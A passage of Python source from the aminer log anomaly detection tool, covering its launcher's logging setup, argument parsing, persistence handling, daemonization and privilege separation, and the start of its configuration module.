{child_return_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) def initialize_loggers(aminer_config, aminer_user_id, aminer_grp_id): """Initialize all loggers.""" datefmt = '%d/%b/%Y:%H:%M:%S %z' log_dir = aminer_config.config_properties.get(AminerConfig.KEY_LOG_DIR, AminerConfig.DEFAULT_LOG_DIR) if log_dir == AminerConfig.DEFAULT_LOG_DIR: try: if not os.path.isdir(log_dir): persistence_dir_path = aminer_config.config_properties.get( AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory( persistence_dir_path, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) if SecureOSFunctions.base_dir_path.decode() == AminerConfig.DEFAULT_PERSISTENCE_DIR: relative_path_log_dir = os.path.split(AminerConfig.DEFAULT_LOG_DIR)[1] os.mkdir(relative_path_log_dir, dir_fd=persistence_dir_fd) os.chown(relative_path_log_dir, aminer_user_id, aminer_grp_id, dir_fd=persistence_dir_fd, follow_symlinks=False) except OSError as e: if e.errno != errno.EEXIST: msg = 'Unable to create log-directory: %s' % log_dir else: msg = e logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg.strip('\n')) print(msg, file=sys.stderr) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_STAT_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_STAT_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) tmp_value = aminer_config.config_properties.get(AminerConfig.KEY_DEBUG_LOG_FILE) if tmp_value is not None and b'/' in tmp_value: print(f"{AminerConfig.KEY_DEBUG_LOG_FILE} attribute must not contain a full directory path, but only the filename.", file=sys.stderr) sys.exit(1) max_bytes = aminer_config.config_properties.get(AminerConfig.KEY_LOG_ROTATION_MAX_BYTES, AminerConfig.DEFAULT_LOG_ROTATION_MAX_BYTES) backup_count = aminer_config.config_properties.get( AminerConfig.KEY_LOG_ROTATION_BACKUP_COUNT, AminerConfig.DEFAULT_LOG_ROTATION_BACKUP_COUNT) log_dir_fd = SecureOSFunctions.secure_open_log_directory(log_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) rc_logger = logging.getLogger(AminerConfig.REMOTE_CONTROL_LOG_NAME) rc_logger.setLevel(logging.DEBUG) remote_control_log_file = aminer_config.config_properties.get( AminerConfig.KEY_REMOTE_CONTROL_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_REMOTE_CONTROL_LOG_FILE)) if not remote_control_log_file.startswith(log_dir): remote_control_log_file = os.path.join(log_dir, remote_control_log_file) try: rc_file_handler = RotatingFileHandler(remote_control_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(remote_control_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {remote_control_log_file}: {e}. Stopping..", file=sys.stderr) sys.exit(1) rc_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) rc_logger.addHandler(rc_file_handler) logging.addLevelName(15, "REMOTECONTROL") stat_logger = logging.getLogger(AminerConfig.STAT_LOG_NAME) stat_logger.setLevel(logging.INFO) stat_log_file = aminer_config.config_properties.get( AminerConfig.KEY_STAT_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_STAT_LOG_FILE)) if not stat_log_file.startswith(log_dir): stat_log_file = os.path.join(log_dir, stat_log_file) try: stat_file_handler = RotatingFileHandler(stat_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(stat_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {stat_log_file}: {e}. Stopping..", file=sys.stderr) sys.exit(1) stat_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(message)s', datefmt=datefmt)) stat_logger.addHandler(stat_file_handler) debug_logger = logging.getLogger(AminerConfig.DEBUG_LOG_NAME) if AminerConfig.DEBUG_LEVEL == 0: debug_logger.setLevel(logging.ERROR) elif AminerConfig.DEBUG_LEVEL == 1: debug_logger.setLevel(logging.INFO) else: debug_logger.setLevel(logging.DEBUG) debug_log_file = aminer_config.config_properties.get( AminerConfig.KEY_DEBUG_LOG_FILE, os.path.join(log_dir, AminerConfig.DEFAULT_DEBUG_LOG_FILE)) if not debug_log_file.startswith(log_dir): debug_log_file = os.path.join(log_dir, debug_log_file) try: debug_file_handler = RotatingFileHandler(debug_log_file, maxBytes=max_bytes, backupCount=backup_count) os.chown(debug_log_file, aminer_user_id, aminer_grp_id, dir_fd=log_dir_fd, follow_symlinks=False) except OSError as e: print(f"Could not create or open {debug_log_file}: {e}. Stopping..", file=sys.stderr) sys.exit(1) debug_file_handler.setFormatter(logging.Formatter(fmt='%(asctime)s %(levelname)s %(message)s', datefmt=datefmt)) debug_logger.addHandler(debug_file_handler) def parse_var(s): """Parse a key, value pair, separated by "=". That's the reverse of ShellArgs. On the command line (argparse) a declaration will typically look like: foo=hello or foo="hello world" """ items = s.split("=") key = items[0].strip() # we remove blanks around keys, as is logical if len(items) > 1: # rejoin the rest: value = "=".join(items[1:]) return key, value def parse_vars(items): """Parse a series of key-value pairs and return a dictionary.""" d = {} if items: for item in items: key, value = parse_var(item) d[key] = value return d def main(): """Run the aminer main program.""" # Extract program name, but only when sure to contain no problematic characters. warnings.filterwarnings('ignore', category=ImportWarning) program_name = sys.argv[0].split('/')[-1] if (program_name == '.') or (program_name == '..') or (re.match('^[a-zA-Z0-9._-]+$', program_name) is None): print('Invalid program name, check your execution args', file=sys.stderr) sys.exit(1) # We will not read stdin from here on, so get rid of it immediately, thus aberrant child cannot manipulate caller's stdin using it. stdin_fd = os.open('/dev/null', os.O_RDONLY) os.dup2(stdin_fd, 0) os.close(stdin_fd) help_message = 'aminer - logdata-anomaly-miner\n' if supports_color(): help_message += colflame else: help_message += flame parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-v', '--version', action='version', version=__version_string__) parser.add_argument('-u', '--check-updates', action='store_true', help='check if updates for the aminer are available.') parser.add_argument('-c', '--config', default='/etc/aminer/config.yml', type=str, help='path to the config-file') parser.add_argument('-D', '--daemon', action='store_false', help='run as a daemon process') parser.add_argument('-s', '--stat', choices=["0", "1", "2"], type=str, help='set the stat level. Possible stat-levels are 0 for no statistics, 1 for normal statistic level and 2 for ' 'verbose statistics.') parser.add_argument('-d', '--debug', choices=["0", "1", "2"], type=str, help='set the debug level. Possible debug-levels are 0 for no debugging, 1 for normal output (INFO and above), 2 ' 'for printing all debug information.') parser.add_argument('--run-analysis', action='store_true', help='enable/disable analysis') parser.add_argument('-C', '--clear', action='store_true', help='removes all persistence directories') parser.add_argument('-r', '--remove', action='append', type=str, help='removes a specific persistence directory') parser.add_argument('-R', '--restore', type=str, help='restore a persistence backup') parser.add_argument('-f', '--from-begin', action='store_true', help='removes RepositioningData before starting the aminer') parser.add_argument('-o', '--offline-mode', action='store_true', help='stop the aminer after all logs have been processed.') parser.add_argument("--config-properties", metavar="KEY=VALUE", nargs='+', help="Set a number of config_properties by using key-value pairs (do not put spaces before or after the = sign). " "If a value contains spaces, you should define it with double quotes: 'foo=\"this is a sentence\". Note that " "values are always treated as strings. If values are already defined in the config_properties, the input " "types are converted to the ones already existing.") args = parser.parse_args() if args.check_updates: import urllib3 url = 'https://raw.githubusercontent.com/ait-aecid/logdata-anomaly-miner/main/source/root/usr/lib/logdata-anomaly-miner/metadata.py' http = urllib3.PoolManager() r = http.request('GET', url, preload_content=True) metadata = r.data.decode() http.clear() lines = metadata.split('\n') curr_version = None for line in lines: if '__version__ = ' in line: curr_version = line.split('__version__ = ')[1].strip('"') break if __version__ == curr_version: print(f"The current aminer version {curr_version} is installed.") else: print(f"A new aminer version exists ({curr_version}). Currently version {__version__} is installed.") print("Use git pull to update the aminer version.") sys.exit(0) config_file_name = args.config run_in_foreground_flag = args.daemon run_analysis_child_flag = args.run_analysis clear_persistence_flag = args.clear remove_persistence_dirs = args.remove from_begin_flag = args.from_begin global offline_mode offline_mode = args.offline_mode if args.restore is not None and ('.' in args.restore or '/' in args.restore): parser.error(f"The restore path {args.restore} must not contain any . or /") if args.remove is not None: for remove in args.remove: if '.' in remove or '/' in remove: parser.error(f"The remove path {remove} must not contain any . or /") restore_relative_persistence_path = args.restore stat_level = 1 debug_level = 1 stat_level_console_flag = False debug_level_console_flag = False if args.stat is not None: stat_level = int(args.stat) stat_level_console_flag = True if args.debug is not None: debug_level = int(args.debug) debug_level_console_flag = True # Load the main configuration file. if not os.path.exists(config_file_name): print(f"{program_name}: config \"{config_file_name}\" not (yet) available!", file=sys.stderr) sys.exit(1) # using the solution here to override config_properties: # https://stackoverflow.com/questions/27146262/create-variable-key-value-pairs-with-argparse-python use_temp_config = False config_properties = parse_vars(args.config_properties) if args.config_properties and "LearnMode" in config_properties: ymlext = [".YAML", ".YML", ".yaml", ".yml"] extension = os.path.splitext(config_file_name)[1] if extension in ymlext: use_temp_config = True fd, temp_config = tempfile.mkstemp(suffix=".yml") with open(config_file_name) as f: for line in f: if "LearnMode" in line: line = "LearnMode: %s" % config_properties["LearnMode"] os.write(fd, line.encode()) config_file_name = temp_config os.close(fd) else: msg = "The LearnMode parameter does not exist in .py configs!" print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) # Minimal import to avoid loading too much within the privileged process. try: aminer_config = AminerConfig.load_config(config_file_name) if use_temp_config: os.remove(config_file_name) config_file_name = args.config except ValueError: sys.exit(1) for config_property in config_properties: if config_property == "LearnMode": continue old_value = aminer_config.config_properties.get(config_property) value = config_properties[config_property] if old_value is not None: try: if isinstance(old_value, bool): if value == "True": value = True elif value == "False": value = False else: msg = f"The {config_property} parameter must be of type {type(old_value)}!" print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) elif isinstance(old_value, int): value = int(value) elif isinstance(old_value, float): value = float(value) elif isinstance(old_value, list): value = ast.literal_eval(value) except ValueError: msg = f"The {config_property} parameter must be of type {type(old_value)}!" print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) else: msg = f"The {config_property} parameter is not set in the config. It will be treated as a string!" print("WARNING: " + msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) aminer_config.config_properties[config_property] = value persistence_dir = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) child_user_name = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_USER) child_group_name = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_GROUP) child_user_id = -1 child_group_id = -1 try: if child_user_name is not None: child_user_id = getpwnam(child_user_name).pw_uid if child_group_name is not None: child_group_id = getgrnam(child_group_name).gr_gid except KeyError: print(f"Failed to resolve {AminerConfig.KEY_AMINER_USER} or {AminerConfig.KEY_AMINER_GROUP}", file=sys.stderr) sys.exit(1) if not stat_level_console_flag and AminerConfig.KEY_LOG_STAT_LEVEL in aminer_config.config_properties: stat_level = aminer_config.config_properties[AminerConfig.KEY_LOG_STAT_LEVEL] if not debug_level_console_flag and AminerConfig.KEY_LOG_DEBUG_LEVEL in aminer_config.config_properties: debug_level = aminer_config.config_properties[AminerConfig.KEY_LOG_DEBUG_LEVEL] if AminerConfig.CONFIG_KEY_ENCODING in aminer_config.config_properties: AminerConfig.ENCODING = aminer_config.config_properties[AminerConfig.CONFIG_KEY_ENCODING] AminerConfig.STAT_LEVEL = stat_level AminerConfig.DEBUG_LEVEL = debug_level initialize_loggers(aminer_config, child_user_id, child_group_id) if restore_relative_persistence_path is not None and (clear_persistence_flag or remove_persistence_dirs): msg = 'The --restore parameter removes all persistence files. Do not use this parameter with --Clear or --Remove!' print(msg, sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if clear_persistence_flag: if remove_persistence_dirs: msg = 'The --clear and --remove arguments must not be used together!' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) clear_persistence(persistence_dir) if remove_persistence_dirs: persistence_dir_name = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) for filename in os.listdir(persistence_dir_name): file_path = os.path.join(persistence_dir_name, filename) try: if not os.path.isdir(file_path): msg = 'The aminer persistence directory should not contain any files.' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) continue shutil.rmtree(file_path) except OSError as e: msg = f"Failed to delete {file_path}. Reason: {e}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) for filename in remove_persistence_dirs: file_path = os.path.join(persistence_dir, filename) try: if not os.path.exists(file_path): continue if not os.path.isdir(file_path): msg = 'The aminer persistence directory should not contain any files.' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) continue shutil.rmtree(file_path) except OSError as e: msg = f"Failed to delete {file_path}. Reason: {e}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) if restore_relative_persistence_path is not None: absolute_persistence_path = os.path.join(persistence_dir, 'backup', restore_relative_persistence_path) if not os.path.exists(absolute_persistence_path): msg = f"{absolute_persistence_path} does not exist. Continuing without restoring persistence." print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) else: clear_persistence(persistence_dir) copytree(absolute_persistence_path, persistence_dir) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) for dirpath, _dirnames, filenames in os.walk(persistence_dir): os.chown(dirpath, child_user_id, child_group_id, dir_fd=persistence_dir_fd, follow_symlinks=False) for filename in filenames: os.chown(os.path.join(dirpath, filename), child_user_id, child_user_id, dir_fd=persistence_dir_fd, follow_symlinks=False) if from_begin_flag: repositioning_data_path = os.path.join(aminer_config.config_properties.get( AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR), 'AnalysisChild', 'RepositioningData') if os.path.exists(repositioning_data_path): os.remove(repositioning_data_path) if run_analysis_child_flag: # Call analysis process, this function will never return. run_analysis_child(aminer_config, program_name) # Start importing of aminer specific components after reading of "config.py" to allow replacement of components via sys.path # from within configuration. log_sources_list = aminer_config.config_properties.get(AminerConfig.KEY_LOG_SOURCES_LIST) if (log_sources_list is None) or not log_sources_list: msg = f"{program_name}: {AminerConfig.KEY_LOG_SOURCES_LIST} not defined" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) # Now create the management entries for each logfile. log_data_resource_dict = {} for resource in log_sources_list: obj = {} if isinstance(resource, str): obj["url"] = decode_string_as_byte_string(resource) elif isinstance(resource, dict): for key, val in resource.items(): if key not in ("url", "json", "xml", "parser_id"): msg = f"Unknown argument in LogResourceList: {key}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if key == "json" and not isinstance(val, bool): msg = "Argument json must be of type boolean!" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if key == "xml" and not isinstance(val, bool): msg = "Argument xml must be of type boolean!" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) obj[key] = val else: msg = "LogResourceList must be of type dict or string" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if "json" in obj and "xml" in obj: msg = "Log resources can not be in the json and xml format at the same time." logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if "json" not in obj: obj["json"] = None if "xml" not in obj: obj["xml"] = None if "parser_id" not in obj: obj["parser_id"] = None if isinstance(obj["url"], str): obj["url"] = decode_string_as_byte_string(obj["url"]) url = obj["url"] if url.startswith(b'file://'): obj["log_resource"] = FileLogDataResource(url, -1) elif url.startswith(b'unix://'): obj["log_resource"] = UnixSocketLogDataResource(url, -1) else: msg = "Config-Error: {'LogResourceList': 'Every log resource URL must be prefixed with either file:// or unix://.'}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if obj["xml"]: obj["log_resource"].default_buffer_size = 1 << 32 if not os.path.exists(url[7:].decode()): msg = f"WARNING: file or socket '{url[7:].decode()}' does not exist (yet)!" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) try: obj["log_resource"].open() except OSError as open_os_error: if open_os_error.errno == errno.EACCES: msg = f"{program_name}: no permission to access{repr(obj)}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) else: msg = f"{program_name}: unexpected error opening {repr(obj)}: {open_os_error.errno} " \ f"({os.strerror(open_os_error.errno)})" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) log_data_resource_dict[url] = obj # Create the remote control socket, if any. Do this in privileged mode to allow binding it at arbitrary locations and support restricted # permissions of any type for current (privileged) uid. remote_control_socket_name = aminer_config.config_properties.get(AminerConfig.KEY_REMOTE_CONTROL_SOCKET_PATH, None) remote_control_socket = None if remote_control_socket_name is not None: if os.path.exists(remote_control_socket_name): try: os.unlink(remote_control_socket_name) except OSError: msg = f"Failed to clean up old remote control socket at {remote_control_socket_name}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) # Create the local socket: there is no easy way to create it with correct permissions, hence a fork is needed, setting umask, # bind the socket. It is also recommended to create the socket in a directory having the correct permissions already. remote_control_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) remote_control_socket.setblocking(False) bind_child_pid = os.fork() if bind_child_pid == 0: os.umask(0o177) remote_control_socket.bind(remote_control_socket_name) # Do not perform any cleanup, flushing of streams. Use _exit(0) to avoid interference with fork. os._exit(0) os.waitpid(bind_child_pid, 0) remote_control_socket.listen(4) # Now have checked all we can get from the configuration in the privileged process. Detach from the TTY when in daemon mode. if not run_in_foreground_flag: child_pid = 0 try: # Fork a child to make sure, we are not the process group leader already. child_pid = os.fork() except Exception as fork_exception: msg = 'Failed to daemonize: %s' % fork_exception print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if child_pid != 0: # This is the parent. os._exit(0) # This is the child. Create a new session and become process group leader. Here we get rid of the controlling tty. os.setsid() # Fork again to become an orphaned process not being session leader, hence not able to get a controlling tty again. try: child_pid = os.fork() except Exception as fork_exception: msg = f"Failed to daemonize: {fork_exception}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.exit(1) if child_pid != 0: # This is the parent. os._exit(0) # Move to root directory to avoid lingering in some cwd someone else might want to unmount. os.chdir('/') # Change the umask here to clean all group/other mask bits so that accidentially created files are not accessible by others. os.umask(0o77) # Install a signal handler catching common stop signals and relaying it to all children for sure. global child_termination_triggered_flag child_termination_triggered_flag = False def graceful_shutdown_handler(_signo, _stackFrame): """React on typical shutdown signals.""" msg = '%s: caught signal, shutting down' % program_name print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info(msg) # Just set the flag. It is likely, that child received same signal also so avoid multiple signaling, which could interrupt the # shutdown procedure again. global child_termination_triggered_flag child_termination_triggered_flag = True import signal signal.signal(signal.SIGHUP, graceful_shutdown_handler) signal.signal(signal.SIGINT, graceful_shutdown_handler) signal.signal(signal.SIGTERM, graceful_shutdown_handler) # Now create the socket to connect the analysis child. (parent_socket, child_socket) = socket.socketpair(socket.AF_UNIX, socket.SOCK_DGRAM, 0) # Have it nonblocking from here on. parent_socket.setblocking(False) child_socket.setblocking(False) # Use normal fork, we should have been detached from TTY already. Flush stderr to avoid duplication of output if both child and # parent want to write something. sys.stderr.flush() child_pid = os.fork() if child_pid == 0: # Relocate the child socket fd to 3 if needed if child_socket.fileno() != 3: os.dup2(child_socket.fileno(), 3) child_socket.close() # Clear the supplementary groups before dropping privileges. This makes only sense when changing the uid or gid. if os.getuid() == 0: if ((child_user_id != -1) and (child_user_id != os.getuid())) or ((child_group_id != -1) and (child_group_id != os.getgid())): os.setgroups([]) # Drop privileges before executing child. setuid/gid will raise an exception when call has failed. if child_group_id != -1: os.setgid(child_group_id) if child_user_id != -1: os.setuid(child_user_id) else: msg = 'INFO: No privilege separation when started as unprivileged user' print(msg, file=sys.stderr) tmp_username = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_USER) tmp_group = aminer_config.config_properties.get(AminerConfig.KEY_AMINER_GROUP) aminer_user_id = -1 aminer_group_id = -1 try: if tmp_username is not None: aminer_user_id = getpwnam(tmp_username).pw_uid if tmp_group is not None: aminer_group_id = getgrnam(tmp_group).gr_gid except KeyError: print(f"Failed to resolve {AminerConfig.KEY_AMINER_USER} or {AminerConfig.KEY_AMINER_GROUP}", file=sys.stderr) sys.exit(1) initialize_loggers(aminer_config, aminer_user_id, aminer_group_id) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info(msg) # Now resolve the specific analysis configuration file (if any). analysis_config_file_name = aminer_config.config_properties.get(AminerConfig.KEY_ANALYSIS_CONFIG_FILE, None) if analysis_config_file_name is None: analysis_config_file_name = config_file_name elif not os.path.isabs(analysis_config_file_name): analysis_config_file_name = os.path.join(os.path.dirname(config_file_name), analysis_config_file_name) # This is the child. Close all parent file descriptors, we do not need. Perhaps this could be done more elegantly. for close_fd in range(4, 1 << 16): try: os.close(close_fd) except OSError as open_os_error: if open_os_error.errno == errno.EBADF: continue msg = f"{program_name}: unexpected exception closing file descriptors:{open_os_error}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) # Flush stderr before exit without any cleanup. sys.stderr.flush() os._exit(1) # Now execute the very same program again, but user might have moved or renamed it meanwhile. This would be problematic with # SUID-binaries (which we do not yet support). Do NOT just fork but also exec to avoid child circumventing # parent's ALSR due to cloned kernel VMA. exec_args = ['aminerChild', '--run-analysis', '--config', analysis_config_file_name, '--stat', str(stat_level), '--debug', str(debug_level)] if offline_mode: exec_args.append("--offline-mode") if args.config_properties: exec_args.append("--config-properties") for config_property in args.config_properties: exec_args.append(config_property) os.execv(sys.argv[0], exec_args) # nosec B606 msg = 'Failed to execute child process' print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) sys.stderr.flush() os._exit(1) child_socket.close() # Send all log resource information currently available to child process. for url, obj in log_data_resource_dict.items(): log_resource = obj["log_resource"] if (log_resource is not None) and (log_resource.get_file_descriptor() >= 0): SecureOSFunctions.send_logstream_descriptor(parent_socket, log_resource.get_file_descriptor(), url) log_resource.close() # Send the remote control server socket, if any and close it afterwards. It is not needed any more on parent side. if remote_control_socket is not None: SecureOSFunctions.send_annotated_file_descriptor(parent_socket, remote_control_socket.fileno(), 'remotecontrol', '') remote_control_socket.close() exit_status = 0 child_termination_triggered_count = 0 while True: if child_termination_triggered_flag: if child_termination_triggered_count == 0: time.sleep(1) elif child_termination_triggered_count < 5: os.kill(child_pid, signal.SIGTERM) else: os.kill(0, signal.SIGKILL) child_termination_triggered_count += 1 (sig_child_pid, sig_status) = os.waitpid(-1, os.WNOHANG) if sig_child_pid != 0: if sig_child_pid == child_pid: if child_termination_triggered_flag or offline_mode: # This was expected, just terminate. break msg = f"{program_name}: Analysis child process {sig_child_pid} terminated unexpectedly with signal 0x{sig_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) exit_status = 1 break # So the child has been cloned, the clone has terminated. This should not happen either. msg = f"{program_name}: untracked child {sig_child_pid} terminated with with signal 0x{sig_status}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) exit_status = 1 # Child information handled, scan for rotated logfiles or other resources, where reopening might make sense. for log_resouce_name, obj in log_data_resource_dict.items(): log_resource = obj["log_resource"] try: if not log_resource.open(reopen_flag=True): continue except OSError as open_os_error: if open_os_error.errno == errno.EACCES: msg = f"{program_name}: no permission to access {log_resouce_name}" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) else: msg = f"{program_name}: unexpected error reopening {log_resouce_name}: {open_os_error.errno} " \ f"({os.strerror(open_os_error.errno)})" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) exit_status = 2 continue SecureOSFunctions.send_logstream_descriptor(parent_socket, log_resource.get_file_descriptor(), log_resouce_name) log_resource.close() time.sleep(1) parent_socket.close() SecureOSFunctions.close_base_directory() SecureOSFunctions.close_log_directory() sys.exit(exit_status) main() logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/000077500000000000000000000000001500476301700272035ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/AminerConfig.py000066400000000000000000000237771500476301700321360ustar00rootroot00000000000000"""This module collects static configuration item keys and configuration loading and handling functions. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import sys import importlib.util import logging KEY_LOG_SOURCES_LIST = 'LogResourceList' KEY_AMINER_USER = 'AminerUser' KEY_AMINER_GROUP = 'AminerGroup' KEY_ANALYSIS_CONFIG_FILE = 'AnalysisConfigFile' KEY_PERSISTENCE_DIR = 'Core.PersistenceDir' KEY_LOG_DIR = 'Core.LogDir' DEFAULT_PERSISTENCE_DIR = '/var/lib/aminer' DEFAULT_LOG_DIR = '/var/lib/aminer/log' KEY_PERSISTENCE_PERIOD = 'Core.PersistencePeriod' DEFAULT_PERSISTENCE_PERIOD = 600 KEY_REMOTE_CONTROL_SOCKET_PATH = 'RemoteControlSocket' KEY_LOG_PREFIX = 'LogPrefix' KEY_RESOURCES_MAX_MEMORY_USAGE = 'Resources.MaxMemoryUsage' REMOTE_CONTROL_LOG_NAME = 'REMOTE_CONTROL' KEY_REMOTE_CONTROL_LOG_FILE = 'Log.RemoteControlLogFile' DEFAULT_REMOTE_CONTROL_LOG_FILE = 'aminerRemoteLog.log' configFN = None STAT_LEVEL = 1 STAT_LOG_NAME = 'STAT' KEY_STAT_LOG_FILE = 'Log.StatisticsFile' DEFAULT_STAT_LOG_FILE = 'statistics.log' DEBUG_LEVEL = 1 DEBUG_LOG_NAME = 'DEBUG' KEY_DEBUG_LOG_FILE = 'Log.DebugFile' DEFAULT_DEBUG_LOG_FILE = 'aminer.log' KEY_LOG_STAT_PERIOD = 'Log.StatisticsPeriod' DEFAULT_STAT_PERIOD = 3600 KEY_LOG_STAT_LEVEL = 'Log.StatisticsLevel' KEY_LOG_DEBUG_LEVEL = 'Log.DebugLevel' KEY_LOG_ROTATION_MAX_BYTES = 'Log.Rotation.MaxBytes' DEFAULT_LOG_ROTATION_MAX_BYTES = 2 << 19 # 1 Megabyte KEY_LOG_ROTATION_BACKUP_COUNT = 'Log.Rotation.BackupCount' DEFAULT_LOG_ROTATION_BACKUP_COUNT = 5 CONFIG_KEY_LOG_LINE_PREFIX = 'LogPrefix' DEFAULT_LOG_LINE_PREFIX = '' CONFIG_KEY_ENCODING = 'Log.Encoding' ENCODING = 'utf-8' KEY_AMINER_ID = 'AminerId' KEY_LOG_LINE_IDENTIFIER = 'LogLineIdentifier' def load_config(config_file_name): """Load the configuration file using the import module.""" aminer_config = None global configFN configFN = config_file_name ymlext = ['.YAML', '.YML', '.yaml', '.yml'] extension = os.path.splitext(config_file_name)[1] yaml_config = None if extension in ymlext: yaml_config = config_file_name config_file_name = os.path.dirname(os.path.abspath(__file__)) + '/' + 'YamlConfig.py' try: spec = importlib.util.spec_from_file_location('aminer_config', config_file_name) aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) if extension in ymlext: aminer_config.load_yaml(yaml_config) except ValueError as e: logging.getLogger(DEBUG_LOG_NAME).error(e) raise e except Exception: msg = f"Failed to load configuration from {config_file_name}" print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) exception_info = sys.exc_info() logging.getLogger(DEBUG_LOG_NAME).error(exception_info) raise Exception(exception_info[0], exception_info[1], exception_info[2]) return aminer_config def build_persistence_file_name(aminer_config, *args): """Build the full persistence file name from persistence directory configuration and path parts.""" persistence_dir_name = aminer_config.config_properties.get(KEY_PERSISTENCE_DIR, DEFAULT_PERSISTENCE_DIR) return os.path.join(persistence_dir_name, *args) def save_config(analysis_context, new_file): """Save the current configuration to a file by using the aminerRemoteControl.""" register_component = 'register_component(' VAR_ID = 0 msg = "" with open(configFN, "r") as file: old = file.read() for config_property in 